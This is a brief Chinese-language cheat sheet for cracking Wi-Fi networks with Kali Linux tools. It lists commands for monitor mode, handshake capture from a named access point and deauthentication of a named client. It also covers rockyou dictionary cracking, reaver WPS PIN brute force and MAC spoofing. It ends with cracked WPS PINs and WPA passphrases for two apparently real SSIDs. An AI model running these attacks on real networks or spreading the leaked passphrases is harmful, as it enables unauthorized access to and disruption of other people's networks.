KailLinux渗透Wifi

KailLinux渗透Wifi

查看网卡

ifconfig

开启网卡监听

wlan=网卡名

airmon-ng start wlan

获取wifi

wlan0mon=监听模式网卡名

airodump-ng wlan0mon

抓包

--bssid wifi的mac
-c 信道
-w 抓包路径
wlan0mon=监听模式网卡名

airodump-ng –bssid 02:0A:19:3E:CD:36 -c 1 -w /home/orange/wlan/cmccn1 wlan0mon

攻击wifi

-c wifi中设备mac -a wifi的mac wlan0mon=监听模式网卡名

aireplay-ng -0 0 -c F8:28:19:CC:AB:D7 -a 02:0A:19:3E:CD:36 wlan0mon

解密

-w 字典路径 抓包路径 aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap

跑pin 破解

-i 无线网卡名 -b 目标AP的MAC -a 自动检测目标AP的最佳配置 -S 使用最小的 DH key 可提高破解速度

reaver -i wlan0mon -b MAC_ADDRESS -a -S

/sbin/ifconfig eth0 down

/sbin/ifconfig eth0 hw ether 00:0C:29:36:97:20

/sbin/ifconfig eth0 up

service network restart

[+] WPS PIN: ‘33235202’ [+] WPA PSK: ‘biatm830610’ [+] AP SSID: ‘TP-LINK_ZZY’

[+] WPS PIN: ‘14978531’ [+] WPA PSK: ‘qbbxp4wz’ [+] AP SSID: ‘CMCC-5sPZ’